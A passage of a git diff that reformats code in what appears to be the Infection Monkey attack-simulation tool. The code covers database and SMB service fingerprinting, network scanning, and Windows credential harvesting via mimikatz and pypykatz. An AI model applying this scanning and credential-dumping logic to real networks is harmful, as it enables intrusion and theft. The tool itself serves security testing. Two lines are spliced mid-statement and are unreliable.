)
sock.close()
return False
except socket.error as e:
if e.errno == errno.ECONNRESET:
LOG.info(
- "Connection was forcibly closed by the remote host. The host: {0} is rejecting the packet.".format(
- host
- )
+ "Connection was forcibly closed by the remote host. The host: {0} is "
+ "rejecting the packet.".format(host)
)
else:
LOG.error(
- "An unknown socket error occurred while trying the mssql fingerprint, closing socket.",
- exc_info=True,
+ "An unknown socket error occurred while trying the mssql fingerprint, "
+ "closing socket.",
+ exc_info=True,
)
sock.close()
return False
self.init_service(
- host.services, self._SCANNED_SERVICE, MSSQLFinger.SQL_BROWSER_DEFAULT_PORT
+ host.services, self._SCANNED_SERVICE, MSSQLFinger.SQL_BROWSER_DEFAULT_PORT
)
# Loop through the server data
@@ -82,7 +81,8 @@ class MSSQLFinger(HostFinger):
if len(instance_info) > 1:
host.services[self._SCANNED_SERVICE][instance_info[1]] = {}
for i in range(1, len(instance_info), 2):
- # Each instance's info is nested under its own name, if there are multiple instances
+ # Each instance's info is nested under its own name, if there are multiple
+ # instances
# each will appear under its own name
host.services[self._SCANNED_SERVICE][instance_info[1]][
instance_info[i - 1]
diff --git a/monkey/infection_monkey/network/mysqlfinger.py b/monkey/infection_monkey/network/mysqlfinger.py
index c04814c9f..d7c56a546 100644
--- a/monkey/infection_monkey/network/mysqlfinger.py
+++ b/monkey/infection_monkey/network/mysqlfinger.py
@@ -49,7 +49,7 @@ class MySQLFinger(HostFinger):
return False
version, curpos = struct_unpack_tracker_string(
- data, curpos
+ data, curpos
) # special coded to solve string parsing
version = version[0].decode()
self.init_service(host.services, SQL_SERVICE, MYSQL_PORT)
diff --git a/monkey/infection_monkey/network/network_scanner.py b/monkey/infection_monkey/network/network_scanner.py
index 0b8a75120..3d3c2c65a 100644
--- a/monkey/infection_monkey/network/network_scanner.py
+++ b/monkey/infection_monkey/network/network_scanner.py
@@ -44,23 +44,26 @@ class NetworkScanner(object):
def _get_inaccessible_subnets_ips(self):
"""
For each of the machine's IPs, checks if it's in one of the subnets specified in the
- 'inaccessible_subnets' config value. If so, all other subnets in the config value shouldn't be accessible.
+ 'inaccessible_subnets' config value. If so, all other subnets in the config value
+ shouldn't be accessible.
All these subnets are returned.
- :return: A list of subnets that shouldn't be accessible from the machine the monkey is running on.
+ :return: A list of subnets that shouldn't be accessible from the machine the monkey is
+ running on.
"""
subnets_to_scan = []
if len(WormConfiguration.inaccessible_subnets) > 1:
for subnet_str in WormConfiguration.inaccessible_subnets:
if NetworkScanner._is_any_ip_in_subnet(
- [str(x) for x in self._ip_addresses], subnet_str
+ [str(x) for x in self._ip_addresses], subnet_str
):
- # If machine has IPs from 2 different subnets in the same group, there's no point checking the other
+ # If machine has IPs from 2 different subnets in the same group, there's no
+ # point checking the other
# subnet.
for other_subnet_str in WormConfiguration.inaccessible_subnets:
if other_subnet_str == subnet_str:
continue
if not NetworkScanner._is_any_ip_in_subnet(
- [str(x) for x in self._ip_addresses], other_subnet_str
+ [str(x) for x in self._ip_addresses], other_subnet_str
):
subnets_to_scan.append(NetworkRange.get_range_obj(other_subnet_str))
break
@@ -74,13 +77,16 @@ class NetworkScanner(object):
:param stop_callback: A callback to check at any point if we should stop scanning
:return: yields a sequence of VictimHost instances
"""
- # We currently use the ITERATION_BLOCK_SIZE as the pool size, however, this may not be the best decision
- # However, the decision what ITERATION_BLOCK_SIZE also requires balancing network usage (pps and bw)
- # Because we are using this to spread out IO heavy tasks, we can probably go a lot higher than CPU core size
+ # We currently use the ITERATION_BLOCK_SIZE as the pool size, however, this may not be
+ # the best decision
+ # However, the decision what ITERATION_BLOCK_SIZE also requires balancing network usage (
+ # pps and bw)
+ # Because we are using this to spread out IO heavy tasks, we can probably go a lot higher
+ # than CPU core size
# But again, balance
pool = Pool(ITERATION_BLOCK_SIZE)
victim_generator = VictimHostGenerator(
- self._ranges, WormConfiguration.blocked_ips, local_ips()
+ self._ranges, WormConfiguration.blocked_ips, local_ips()
)
victims_count = 0
diff --git a/monkey/infection_monkey/network/ping_scanner.py b/monkey/infection_monkey/network/ping_scanner.py
index dd1577e47..3e9c22492 100644
--- a/monkey/infection_monkey/network/ping_scanner.py
+++ b/monkey/infection_monkey/network/ping_scanner.py
@@ -34,9 +34,9 @@ class PingScanner(HostScanner, HostFinger):
timeout /= 1000
return 0 == subprocess.call(
- ["ping", PING_COUNT_FLAG, "1", PING_TIMEOUT_FLAG, str(timeout), host.ip_addr],
- stdout=self._devnull,
- stderr=self._devnull,
+ ["ping", PING_COUNT_FLAG, "1", PING_TIMEOUT_FLAG, str(timeout), host.ip_addr],
+ stdout=self._devnull,
+ stderr=self._devnull,
)
def get_host_fingerprint(self, host):
@@ -46,10 +46,10 @@ class PingScanner(HostScanner, HostFinger):
timeout /= 1000
sub_proc = subprocess.Popen(
- ["ping", PING_COUNT_FLAG, "1", PING_TIMEOUT_FLAG, str(timeout), host.ip_addr],
- stdout=subprocess.PIPE,
- stderr=subprocess.PIPE,
- text=True,
+ ["ping", PING_COUNT_FLAG, "1", PING_TIMEOUT_FLAG, str(timeout), host.ip_addr],
+ stdout=subprocess.PIPE,
+ stderr=subprocess.PIPE,
+ text=True,
)
output = " ".join(sub_proc.communicate())
@@ -59,7 +59,8 @@ class PingScanner(HostScanner, HostFinger):
ttl = int(regex_result.group(0))
if ttl <= LINUX_TTL:
host.os["type"] = "linux"
- else: # as far we we know, could also be OSX/BSD but lets handle that when it comes up.
+ else: # as far we we know, could also be OSX/BSD but lets handle that when it
+ # comes up.
host.os["type"] = "windows"
host.icmp = True
diff --git a/monkey/infection_monkey/network/postgresql_finger.py b/monkey/infection_monkey/network/postgresql_finger.py
index 16f6327f9..db88873f0 100644
--- a/monkey/infection_monkey/network/postgresql_finger.py
+++ b/monkey/infection_monkey/network/postgresql_finger.py
@@ -17,32 +17,32 @@ class PostgreSQLFinger(HostFinger):
# Class related consts
_SCANNED_SERVICE = "PostgreSQL"
POSTGRESQL_DEFAULT_PORT = 5432
- CREDS = {"username": ID_STRING, "password": ID_STRING}
+ CREDS = {"username":ID_STRING, "password":ID_STRING}
CONNECTION_DETAILS = {
- "ssl_conf": "SSL is configured on the PostgreSQL server.\n",
- "ssl_not_conf": "SSL is NOT configured on the PostgreSQL server.\n",
- "all_ssl": "SSL connections can be made by all.\n",
- "all_non_ssl": "Non-SSL connections can be made by all.\n",
- "selected_ssl": "SSL connections can be made by selected hosts only OR "
- "non-SSL usage is forced.\n",
- "selected_non_ssl": "Non-SSL connections can be made by selected hosts only OR "
- "SSL usage is forced.\n",
- "only_selected": "Only selected hosts can make connections (SSL or non-SSL).\n",
+ "ssl_conf":"SSL is configured on the PostgreSQL server.\n",
+ "ssl_not_conf":"SSL is NOT configured on the PostgreSQL server.\n",
+ "all_ssl":"SSL connections can be made by all.\n",
+ "all_non_ssl":"Non-SSL connections can be made by all.\n",
+ "selected_ssl":"SSL connections can be made by selected hosts only OR "
+ "non-SSL usage is forced.\n",
+ "selected_non_ssl":"Non-SSL connections can be made by selected hosts only OR "
+ "SSL usage is forced.\n",
+ "only_selected":"Only selected hosts can make connections (SSL or non-SSL).\n",
}
RELEVANT_EX_SUBSTRINGS = {
- "no_auth": "password authentication failed",
- "no_entry": "entry for host", # "no pg_hba.conf entry for host" but filename may be diff
+ "no_auth":"password authentication failed",
+ "no_entry":"entry for host", # "no pg_hba.conf entry for host" but filename may be diff
}
def get_host_fingerprint(self, host):
try:
psycopg2.connect(
- host=host.ip_addr,
- port=self.POSTGRESQL_DEFAULT_PORT,
- user=self.CREDS["username"],
- password=self.CREDS["password"],
- sslmode="prefer",
- connect_timeout=MEDIUM_REQUEST_TIMEOUT,
+ host=host.ip_addr,
+ port=self.POSTGRESQL_DEFAULT_PORT,
+ user=self.CREDS["username"],
+ password=self.CREDS["password"],
+ sslmode="prefer",
+ connect_timeout=MEDIUM_REQUEST_TIMEOUT,
) # don't need to worry about DB name; creds are wrong, won't check
# if it comes here, the creds worked
@@ -50,13 +50,15 @@ class PostgreSQLFinger(HostFinger):
# perhaps the service is a honeypot
self.init_service(host.services, self._SCANNED_SERVICE, self.POSTGRESQL_DEFAULT_PORT)
host.services[self._SCANNED_SERVICE]["communication_encryption_details"] = (
- "The PostgreSQL server was unexpectedly accessible with the credentials - "
- + f"user: '{self.CREDS['username']}' and password: '{self.CREDS['password']}'. Is this a honeypot?"
+ "The PostgreSQL server was unexpectedly accessible with the credentials - "
+ + f"user: '{self.CREDS['username']}' and password: '"
+ f"{self.CREDS['password']}'. Is this a honeypot?"
)
return True
except psycopg2.OperationalError as ex:
- # try block will throw an OperationalError since the credentials are wrong, which we then analyze
+ # try block will throw an OperationalError since the credentials are wrong, which we
+ # then analyze
try:
exception_string = str(ex)
@@ -92,7 +94,7 @@ class PostgreSQLFinger(HostFinger):
self.get_connection_details_ssl_not_configured(exceptions)
host.services[self._SCANNED_SERVICE]["communication_encryption_details"] = "".join(
- self.ssl_connection_details
+ self.ssl_connection_details
)
@staticmethod
@@ -120,7 +122,7 @@ class PostgreSQLFinger(HostFinger):
self.ssl_connection_details.append(self.CONNECTION_DETAILS["all_non_ssl"])
else:
if (
- ssl_selected_comms_only
+ ssl_selected_comms_only
): # if only selected SSL allowed and only selected non-SSL allowed
self.ssl_connection_details[-1] = self.CONNECTION_DETAILS["only_selected"]
else:
diff --git a/monkey/infection_monkey/network/smbfinger.py b/monkey/infection_monkey/network/smbfinger.py
index 457d0213d..795ac2be5 100644
--- a/monkey/infection_monkey/network/smbfinger.py
+++ b/monkey/infection_monkey/network/smbfinger.py
@@ -14,9 +14,9 @@ LOG = logging.getLogger(__name__)
class Packet:
fields = odict(
- [
- ("data", ""),
- ]
+ [
+ ("data", ""),
+ ]
)
def __init__(self, **kw):
@@ -38,20 +38,20 @@ class Packet:
# SMB Packets
class SMBHeader(Packet):
fields = odict(
- [
- ("proto", b"\xff\x53\x4d\x42"),
- ("cmd", b"\x72"),
- ("errorcode", b"\x00\x00\x00\x00"),
- ("flag1", b"\x00"),
- ("flag2", b"\x00\x00"),
- ("pidhigh", b"\x00\x00"),
- ("signature", b"\x00\x00\x00\x00\x00\x00\x00\x00"),
- ("reserved", b"\x00\x00"),
- ("tid", b"\x00\x00"),
- ("pid", b"\x00\x00"),
- ("uid", b"\x00\x00"),
- ("mid", b"\x00\x00"),
- ]
+ [
+ ("proto", b"\xff\x53\x4d\x42"),
+ ("cmd", b"\x72"),
+ ("errorcode", b"\x00\x00\x00\x00"),
+ ("flag1", b"\x00"),
+ ("flag2", b"\x00\x00"),
+ ("pidhigh", b"\x00\x00"),
+ ("signature", b"\x00\x00\x00\x00\x00\x00\x00\x00"),
+ ("reserved", b"\x00\x00"),
+ ("tid", b"\x00\x00"),
+ ("pid", b"\x00\x00"),
+ ("uid", b"\x00\x00"),
+ ("mid", b"\x00\x00"),
+ ]
)
@@ -64,55 +64,63 @@ class SMBNego(Packet):
class SMBNegoFingerData(Packet):
fields = odict(
- [
- ("separator1", b"\x02"),
- (
- "dialect1",
- b"\x50\x43\x20\x4e\x45\x54\x57\x4f\x52\x4b\x20\x50\x52\x4f\x47\x52\x41\x4d\x20\x31\x2e\x30\x00",
- ),
- ("separator2", b"\x02"),
- ("dialect2", b"\x4c\x41\x4e\x4d\x41\x4e\x31\x2e\x30\x00"),
- ("separator3", b"\x02"),
- (
- "dialect3",
- b"\x57\x69\x6e\x64\x6f\x77\x73\x20\x66\x6f\x72\x20\x57\x6f\x72\x6b\x67\x72\x6f\x75\x70\x73\x20\x33\x2e\x31\x61\x00",
- ),
- ("separator4", b"\x02"),
- ("dialect4", b"\x4c\x4d\x31\x2e\x32\x58\x30\x30\x32\x00"),
- ("separator5", b"\x02"),
- ("dialect5", b"\x4c\x41\x4e\x4d\x41\x4e\x32\x2e\x31\x00"),
- ("separator6", b"\x02"),
- ("dialect6", b"\x4e\x54\x20\x4c\x4d\x20\x30\x2e\x31\x32\x00"),
- ]
+ [
+ ("separator1", b"\x02"),
+ (
+ "dialect1",
+ b"\x50\x43\x20\x4e\x45\x54\x57\x4f\x52\x4b\x20\x50\x52\x4f\x47\x52\x41\x4d"
+ b"\x20\x31\x2e\x30\x00",
+ ),
+ ("separator2", b"\x02"),
+ ("dialect2", b"\x4c\x41\x4e\x4d\x41\x4e\x31\x2e\x30\x00"),
+ ("separator3", b"\x02"),
+ (
+ "dialect3",
+ b"\x57\x69\x6e\x64\x6f\x77\x73\x20\x66\x6f\x72\x20\x57\x6f\x72\x6b\x67\x72"
+ b"\x6f\x75\x70\x73\x20\x33\x2e\x31\x61\x00",
+ ),
+ ("separator4", b"\x02"),
+ ("dialect4", b"\x4c\x4d\x31\x2e\x32\x58\x30\x30\x32\x00"),
+ ("separator5", b"\x02"),
+ ("dialect5", b"\x4c\x41\x4e\x4d\x41\x4e\x32\x2e\x31\x00"),
+ ("separator6", b"\x02"),
+ ("dialect6", b"\x4e\x54\x20\x4c\x4d\x20\x30\x2e\x31\x32\x00"),
+ ]
)
class SMBSessionFingerData(Packet):
fields = odict(
- [
- ("wordcount", b"\x0c"),
- ("AndXCommand", b"\xff"),
- ("reserved", b"\x00"),
- ("andxoffset", b"\x00\x00"),
- ("maxbuff", b"\x04\x11"),
- ("maxmpx", b"\x32\x00"),
- ("vcnum", b"\x00\x00"),
- ("sessionkey", b"\x00\x00\x00\x00"),
- ("securitybloblength", b"\x4a\x00"),
- ("reserved2", b"\x00\x00\x00\x00"),
- ("capabilities", b"\xd4\x00\x00\xa0"),
- ("bcc1", ""),
- (
- "Data",
- b"\x60\x48\x06\x06\x2b\x06\x01\x05\x05\x02\xa0\x3e\x30\x3c\xa0\x0e\x30\x0c\x06\x0a\x2b\x06\x01\x04\x01\x82\x37\x02"
- b"\x02\x0a\xa2\x2a\x04\x28\x4e\x54\x4c\x4d\x53\x53\x50\x00\x01\x00\x00\x00\x07\x82\x08\xa2\x00\x00\x00\x00\x00\x00"
- b"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x05\x01\x28\x0a\x00\x00\x00\x0f\x00\x57\x00\x69\x00\x6e\x00\x64\x00\x6f"
- b"\x00\x77\x00\x73\x00\x20\x00\x32\x00\x30\x00\x30\x00\x32\x00\x20\x00\x53\x00\x65\x00\x72\x00\x76\x00\x69\x00\x63"
- b"\x00\x65\x00\x20\x00\x50\x00\x61\x00\x63\x00\x6b\x00\x20\x00\x33\x00\x20\x00\x32\x00\x36\x00\x30\x00\x30\x00\x00"
- b"\x00\x57\x00\x69\x00\x6e\x00\x64\x00\x6f\x00\x77\x00\x73\x00\x20\x00\x32\x00\x30\x00\x30\x00\x32\x00\x20\x00\x35"
- b"\x00\x2e\x00\x31\x00\x00\x00\x00\x00",
- ),
- ]
+ [
+ ("wordcount", b"\x0c"),
+ ("AndXCommand", b"\xff"),
+ ("reserved", b"\x00"),
+ ("andxoffset", b"\x00\x00"),
+ ("maxbuff", b"\x04\x11"),
+ ("maxmpx", b"\x32\x00"),
+ ("vcnum", b"\x00\x00"),
+ ("sessionkey", b"\x00\x00\x00\x00"),
+ ("securitybloblength", b"\x4a\x00"),
+ ("reserved2", b"\x00\x00\x00\x00"),
+ ("capabilities", b"\xd4\x00\x00\xa0"),
+ ("bcc1", ""),
+ (
+ "Data",
+ b"\x60\x48\x06\x06\x2b\x06\x01\x05\x05\x02\xa0\x3e\x30\x3c\xa0\x0e\x30\x0c"
+ b"\x06\x0a\x2b\x06\x01\x04\x01\x82\x37\x02"
+ b"\x02\x0a\xa2\x2a\x04\x28\x4e\x54\x4c\x4d\x53\x53\x50\x00\x01\x00\x00\x00"
+ b"\x07\x82\x08\xa2\x00\x00\x00\x00\x00\x00"
+ b"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x05\x01\x28\x0a\x00\x00\x00\x0f"
+ b"\x00\x57\x00\x69\x00\x6e\x00\x64\x00\x6f"
+ b"\x00\x77\x00\x73\x00\x20\x00\x32\x00\x30\x00\x30\x00\x32\x00\x20\x00\x53"
+ b"\x00\x65\x00\x72\x00\x76\x00\x69\x00\x63"
+ b"\x00\x65\x00\x20\x00\x50\x00\x61\x00\x63\x00\x6b\x00\x20\x00\x33\x00\x20"
+ b"\x00\x32\x00\x36\x00\x30\x00\x30\x00\x00"
+ b"\x00\x57\x00\x69\x00\x6e\x00\x64\x00\x6f\x00\x77\x00\x73\x00\x20\x00\x32"
+ b"\x00\x30\x00\x30\x00\x32\x00\x20\x00\x35"
+ b"\x00\x2e\x00\x31\x00\x00\x00\x00\x00",
+ ),
+ ]
)
def calculate(self):
@@ -159,10 +167,10 @@ class SMBFinger(HostFinger):
if data[8:10] == b"\x73\x16":
length = struct.unpack(" dict:
- return {"environment": get_monkey_environment()}
+ return {"environment":get_monkey_environment()}
diff --git a/monkey/infection_monkey/system_info/collectors/hostname_collector.py b/monkey/infection_monkey/system_info/collectors/hostname_collector.py
index 0aeecd9fb..783a0d4fd 100644
--- a/monkey/infection_monkey/system_info/collectors/hostname_collector.py
+++ b/monkey/infection_monkey/system_info/collectors/hostname_collector.py
@@ -12,4 +12,4 @@ class HostnameCollector(SystemInfoCollector):
super().__init__(name=HOSTNAME_COLLECTOR)
def collect(self) -> dict:
- return {"hostname": socket.getfqdn()}
+ return {"hostname":socket.getfqdn()}
diff --git a/monkey/infection_monkey/system_info/collectors/process_list_collector.py b/monkey/infection_monkey/system_info/collectors/process_list_collector.py
index a95ac385b..6fae4144b 100644
--- a/monkey/infection_monkey/system_info/collectors/process_list_collector.py
+++ b/monkey/infection_monkey/system_info/collectors/process_list_collector.py
@@ -30,22 +30,23 @@ class ProcessListCollector(SystemInfoCollector):
for process in psutil.process_iter():
try:
processes[process.pid] = {
- "name": process.name(),
- "pid": process.pid,
- "ppid": process.ppid(),
- "cmdline": " ".join(process.cmdline()),
- "full_image_path": process.exe(),
+ "name":process.name(),
+ "pid":process.pid,
+ "ppid":process.ppid(),
+ "cmdline":" ".join(process.cmdline()),
+ "full_image_path":process.exe(),
}
except (psutil.AccessDenied, WindowsError):
- # we may be running as non root and some processes are impossible to acquire in Windows/Linux.
+ # we may be running as non root and some processes are impossible to acquire in
+ # Windows/Linux.
# In this case we'll just add what we know.
processes[process.pid] = {
- "name": "null",
- "pid": process.pid,
- "ppid": process.ppid(),
- "cmdline": "ACCESS DENIED",
- "full_image_path": "null",
+ "name":"null",
+ "pid":process.pid,
+ "ppid":process.ppid(),
+ "cmdline":"ACCESS DENIED",
+ "full_image_path":"null",
}
continue
- return {"process_list": processes}
+ return {"process_list":processes}
diff --git a/monkey/infection_monkey/system_info/collectors/scoutsuite_collector/scoutsuite_collector.py b/monkey/infection_monkey/system_info/collectors/scoutsuite_collector/scoutsuite_collector.py
index ec8a5e488..ba5cda49d 100644
--- a/monkey/infection_monkey/system_info/collectors/scoutsuite_collector/scoutsuite_collector.py
+++ b/monkey/infection_monkey/system_info/collectors/scoutsuite_collector/scoutsuite_collector.py
@@ -24,10 +24,10 @@ def scan_cloud_security(cloud_type: CloudProviders):
def run_scoutsuite(cloud_type: str) -> Union[BaseProvider, dict]:
return ScoutSuite.api_run.run(
- provider=cloud_type,
- aws_access_key_id=WormConfiguration.aws_access_key_id,
- aws_secret_access_key=WormConfiguration.aws_secret_access_key,
- aws_session_token=WormConfiguration.aws_session_token,
+ provider=cloud_type,
+ aws_access_key_id=WormConfiguration.aws_access_key_id,
+ aws_secret_access_key=WormConfiguration.aws_secret_access_key,
+ aws_session_token=WormConfiguration.aws_session_token,
)
diff --git a/monkey/infection_monkey/system_info/netstat_collector.py b/monkey/infection_monkey/system_info/netstat_collector.py
index d35b4c1fb..0d8b73cb9 100644
--- a/monkey/infection_monkey/system_info/netstat_collector.py
+++ b/monkey/infection_monkey/system_info/netstat_collector.py
@@ -1,4 +1,5 @@
-# Inspired by Giampaolo Rodola's psutil example from https://github.com/giampaolo/psutil/blob/master/scripts/netstat.py
+# Inspired by Giampaolo Rodola's psutil example from
+# https://github.com/giampaolo/psutil/blob/master/scripts/netstat.py
import logging
import socket
@@ -19,10 +20,10 @@ class NetstatCollector(object):
AF_INET6 = getattr(socket, "AF_INET6", object())
proto_map = {
- (AF_INET, SOCK_STREAM): "tcp",
- (AF_INET6, SOCK_STREAM): "tcp6",
- (AF_INET, SOCK_DGRAM): "udp",
- (AF_INET6, SOCK_DGRAM): "udp6",
+ (AF_INET, SOCK_STREAM):"tcp",
+ (AF_INET6, SOCK_STREAM):"tcp6",
+ (AF_INET, SOCK_DGRAM):"udp",
+ (AF_INET6, SOCK_DGRAM):"udp6",
}
@staticmethod
@@ -33,11 +34,11 @@ class NetstatCollector(object):
@staticmethod
def _parse_connection(c):
return {
- "proto": NetstatCollector.proto_map[(c.family, c.type)],
- "local_address": c.laddr[0],
- "local_port": c.laddr[1],
- "remote_address": c.raddr[0] if c.raddr else None,
- "remote_port": c.raddr[1] if c.raddr else None,
- "status": c.status,
- "pid": c.pid,
+ "proto":NetstatCollector.proto_map[(c.family, c.type)],
+ "local_address":c.laddr[0],
+ "local_port":c.laddr[1],
+ "remote_address":c.raddr[0] if c.raddr else None,
+ "remote_port":c.raddr[1] if c.raddr else None,
+ "status":c.status,
+ "pid":c.pid,
}
diff --git a/monkey/infection_monkey/system_info/system_info_collector.py b/monkey/infection_monkey/system_info/system_info_collector.py
index ac269f5b0..fe160de16 100644
--- a/monkey/infection_monkey/system_info/system_info_collector.py
+++ b/monkey/infection_monkey/system_info/system_info_collector.py
@@ -7,9 +7,12 @@ from infection_monkey.utils.plugins.plugin import Plugin
class SystemInfoCollector(Plugin, metaclass=ABCMeta):
"""
- ABC for system info collection. See system_info_collector_handler for more info. Basically, to implement a new system info
- collector, inherit from this class in an implementation in the infection_monkey.system_info.collectors class, and override
- the 'collect' method. Don't forget to parse your results in the Monkey Island and to add the collector to the configuration
+ ABC for system info collection. See system_info_collector_handler for more info. Basically,
+ to implement a new system info
+ collector, inherit from this class in an implementation in the
+ infection_monkey.system_info.collectors class, and override
+ the 'collect' method. Don't forget to parse your results in the Monkey Island and to add the
+ collector to the configuration
as well - see monkey_island.cc.services.processing.system_info_collectors for examples.
See the Wiki page "How to add a new System Info Collector to the Monkey?" for a detailed guide.
diff --git a/monkey/infection_monkey/system_info/system_info_collectors_handler.py b/monkey/infection_monkey/system_info/system_info_collectors_handler.py
index 9c883084c..5a77ee9e9 100644
--- a/monkey/infection_monkey/system_info/system_info_collectors_handler.py
+++ b/monkey/infection_monkey/system_info/system_info_collectors_handler.py
@@ -24,12 +24,11 @@ class SystemInfoCollectorsHandler(object):
# If we failed one collector, no need to stop execution. Log and continue.
LOG.error("Collector {} failed. Error info: {}".format(collector.name, e))
LOG.info(
- "All system info collectors executed. Total {} executed, out of which {} collected successfully.".format(
- len(self.collectors_list), successful_collections
- )
+ "All system info collectors executed. Total {} executed, out of which {} "
+ "collected successfully.".format(len(self.collectors_list), successful_collections)
)
- SystemInfoTelem({"collectors": system_info_telemetry}).send()
+ SystemInfoTelem({"collectors":system_info_telemetry}).send()
@staticmethod
def config_to_collectors_list() -> Sequence[SystemInfoCollector]:
diff --git a/monkey/infection_monkey/system_info/windows_cred_collector/mimikatz_cred_collector.py b/monkey/infection_monkey/system_info/windows_cred_collector/mimikatz_cred_collector.py
index 0bed5c7f8..579cfb037 100644
--- a/monkey/infection_monkey/system_info/windows_cred_collector/mimikatz_cred_collector.py
+++ b/monkey/infection_monkey/system_info/windows_cred_collector/mimikatz_cred_collector.py
@@ -22,5 +22,5 @@ class MimikatzCredentialCollector(object):
# Lets not use "." and "$" in keys, because it will confuse mongo.
# Ideally we should refactor island not to use a dict and simply parse credential list.
key = cred.username.replace(".", ",").replace("$", "")
- cred_dict.update({key: cred.to_dict()})
+ cred_dict.update({key:cred.to_dict()})
return cred_dict
diff --git a/monkey/infection_monkey/system_info/windows_cred_collector/pypykatz_handler.py b/monkey/infection_monkey/system_info/windows_cred_collector/pypykatz_handler.py
index 23bcce771..11415ddac 100644
--- a/monkey/infection_monkey/system_info/windows_cred_collector/pypykatz_handler.py
+++ b/monkey/infection_monkey/system_info/windows_cred_collector/pypykatz_handler.py
@@ -43,7 +43,7 @@ def _get_creds_from_pypykatz_session(pypykatz_session: Dict) -> List[WindowsCred
def _get_creds_from_pypykatz_creds(
- pypykatz_creds: List[PypykatzCredential],
+ pypykatz_creds: List[PypykatzCredential],
) -> List[WindowsCredentials]:
creds = _filter_empty_creds(pypykatz_creds)
return [_get_windows_cred(cred) for cred in creds]
@@ -72,7 +72,7 @@ def _get_windows_cred(pypykatz_cred: PypykatzCredential):
if "LMhash" in pypykatz_cred:
lm_hash = _hash_to_string(pypykatz_cred["LMhash"])
return WindowsCredentials(
- username=username, password=password, ntlm_hash=ntlm_hash, lm_hash=lm_hash
+ username=username, password=password, ntlm_hash=ntlm_hash, lm_hash=lm_hash
)
diff --git a/monkey/infection_monkey/system_info/windows_cred_collector/test_pypykatz_handler.py b/monkey/infection_monkey/system_info/windows_cred_collector/test_pypykatz_handler.py
index f2d9565b1..89b570bad 100644
--- a/monkey/infection_monkey/system_info/windows_cred_collector/test_pypykatz_handler.py
+++ b/monkey/infection_monkey/system_info/windows_cred_collector/test_pypykatz_handler.py
@@ -8,119 +8,123 @@ from infection_monkey.system_info.windows_cred_collector.pypykatz_handler import
class TestPypykatzHandler(TestCase):
# Made up credentials, but structure of dict should be roughly the same
PYPYKATZ_SESSION = {
- "authentication_id": 555555,
- "session_id": 3,
- "username": "Monkey",
- "domainname": "ReAlDoMaIn",
- "logon_server": "ReAlDoMaIn",
- "logon_time": "2020-06-02T04:53:45.256562+00:00",
- "sid": "S-1-6-25-260123139-3611579848-5589493929-3021",
- "luid": 123086,
- "msv_creds": [
+ "authentication_id":555555,
+ "session_id":3,
+ "username":"Monkey",
+ "domainname":"ReAlDoMaIn",
+ "logon_server":"ReAlDoMaIn",
+ "logon_time":"2020-06-02T04:53:45.256562+00:00",
+ "sid":"S-1-6-25-260123139-3611579848-5589493929-3021",
+ "luid":123086,
+ "msv_creds":[
{
- "username": "monkey",
- "domainname": "ReAlDoMaIn",
- "NThash": b"1\xb7 Dict:
return {
- "username": self.username,
- "password": self.password,
- "ntlm_hash": self.ntlm_hash,
- "lm_hash": self.lm_hash,
+ "username":self.username,
+ "password":self.password,
+ "ntlm_hash":self.ntlm_hash,
+ "lm_hash":self.lm_hash,
}
diff --git a/monkey/infection_monkey/system_info/wmi_consts.py b/monkey/infection_monkey/system_info/wmi_consts.py
index 71366a466..13913f349 100644
--- a/monkey/infection_monkey/system_info/wmi_consts.py
+++ b/monkey/infection_monkey/system_info/wmi_consts.py
@@ -17,7 +17,7 @@ WMI_CLASSES = {
# monkey should run as *** SYSTEM *** !!!
#
WMI_LDAP_CLASSES = {
- "ds_user": (
+ "ds_user":(
"DS_sAMAccountName",
"DS_userPrincipalName",
"DS_sAMAccountType",
@@ -36,7 +36,7 @@ WMI_LDAP_CLASSES = {
"DS_logonCount",
"DS_accountExpires",
),
- "ds_group": (
+ "ds_group":(
"DS_whenChanged",
"DS_whenCreated",
"DS_sAMAccountName",
@@ -52,7 +52,7 @@ WMI_LDAP_CLASSES = {
"DS_distinguishedName",
"ADSIPath",
),
- "ds_computer": (
+ "ds_computer":(
"DS_dNSHostName",
"ADSIPath",
"DS_accountExpires",
diff --git a/monkey/infection_monkey/system_singleton.py b/monkey/infection_monkey/system_singleton.py
index 9576ff9f7..e1a7e467e 100644
--- a/monkey/infection_monkey/system_singleton.py
+++ b/monkey/infection_monkey/system_singleton.py
@@ -38,13 +38,14 @@ class WindowsSystemSingleton(_SystemSingleton):
assert self._mutex_handle is None, "Singleton already locked"
handle = ctypes.windll.kernel32.CreateMutexA(
- None, ctypes.c_bool(True), ctypes.c_char_p(self._mutex_name.encode())
+ None, ctypes.c_bool(True), ctypes.c_char_p(self._mutex_name.encode())
)
last_error = ctypes.windll.kernel32.GetLastError()
if not handle:
LOG.error(
- "Cannot acquire system singleton %r, unknown error %d", self._mutex_name, last_error
+ "Cannot acquire system singleton %r, unknown error %d", self._mutex_name,
+ last_error
)
return False
if winerror.ERROR_ALREADY_EXISTS == last_error:
@@ -80,10 +81,10 @@ class LinuxSystemSingleton(_SystemSingleton):
sock.bind("\0" + self._unix_sock_name)
except socket.error as e:
LOG.error(
- "Cannot acquire system singleton %r, error code %d, error: %s",
- self._unix_sock_name,
- e.args[0],
- e.args[1],
+ "Cannot acquire system singleton %r, error code %d, error: %s",
+ self._unix_sock_name,
+ e.args[0],
+ e.args[1],
)
return False
diff --git a/monkey/infection_monkey/telemetry/attack/attack_telem.py b/monkey/infection_monkey/telemetry/attack/attack_telem.py
index 125906c74..87361c5f5 100644
--- a/monkey/infection_monkey/telemetry/attack/attack_telem.py
+++ b/monkey/infection_monkey/telemetry/attack/attack_telem.py
@@ -18,4 +18,4 @@ class AttackTelem(BaseTelem):
telem_category = TelemCategoryEnum.ATTACK
def get_data(self):
- return {"status": self.status.value, "technique": self.technique}
+ return {"status":self.status.value, "technique":self.technique}
diff --git a/monkey/infection_monkey/telemetry/attack/t1005_telem.py b/monkey/infection_monkey/telemetry/attack/t1005_telem.py
index 545bb47d3..3214dea6e 100644
--- a/monkey/infection_monkey/telemetry/attack/t1005_telem.py
+++ b/monkey/infection_monkey/telemetry/attack/t1005_telem.py
@@ -15,5 +15,5 @@ class T1005Telem(AttackTelem):
def get_data(self):
data = super(T1005Telem, self).get_data()
- data.update({"gathered_data_type": self.gathered_data_type, "info": self.info})
+ data.update({"gathered_data_type":self.gathered_data_type, "info":self.info})
return data
diff --git a/monkey/infection_monkey/telemetry/attack/t1064_telem.py b/monkey/infection_monkey/telemetry/attack/t1064_telem.py
index f8cdf379c..8a1acbfdf 100644
--- a/monkey/infection_monkey/telemetry/attack/t1064_telem.py
